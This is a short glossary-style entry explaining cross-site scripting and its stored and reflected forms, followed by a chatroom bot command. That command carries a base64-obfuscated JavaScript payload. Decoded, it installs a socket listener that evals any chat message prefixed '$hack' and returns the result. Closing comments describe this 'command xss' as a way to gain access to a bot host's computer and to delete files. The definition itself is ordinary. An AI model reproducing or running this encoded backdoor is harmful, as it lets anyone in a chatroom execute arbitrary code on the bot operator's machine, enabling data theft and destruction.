Short for Cross Site Scripting. A type of web based security vulnerability using client side scripts such as Javascript.
XSS takes place as a consequence of improper input sanitization. When the input provided by the user is not properly sanitized, an ill willed user may insert scripting code into a web page, which in turn will be executed by the visitor's browser. There are 2 kinds of XSS attacks: stored or reflected. Stored would mean that the injected code is permanently stored in the page, such as in a comment. Reflected would mean that it only appears once when the payload (i.e. the malicious input) is part of the request, maybe in parameters or cookies.
^evaljs eval1-1(atob("Ym90LnNvY2tldC5vbignbWVzc2FnZScsIGZ1bmN0aW9uKGRhdGEpIHsKICBsZXQgeCA9IGRhdGEubXNnLmluZGV4T2YoJyAnKTsKICBpZihkYXRhLm1zZy5zbGljZSgwLCB4KSA9PSAnJGhhY2snKSB7CiAgICB0cnkgewogICAgICBib3Quc29ja2V0LmVtaXQoJ21lc3NhZ2UnLCBldmFsKGRhdGEubXNnLnNsaWNlKHggKyAxKSkpOwogICAgfSBjYXRjaChlcikgewogICAgICBib3Quc29ja2V0LmVtaXQoJ21lc3NhZ2UnLCAiRVJSOiAiICsgZXIudG9TdHJpbmcoKSk7CiAgICB9CiAgfQp9KQ=="))
/* command xss is a type of XSS attack performed on chatroombots to gain access to the host's computer */
/* They found a command xss in my bot and deleted all my files */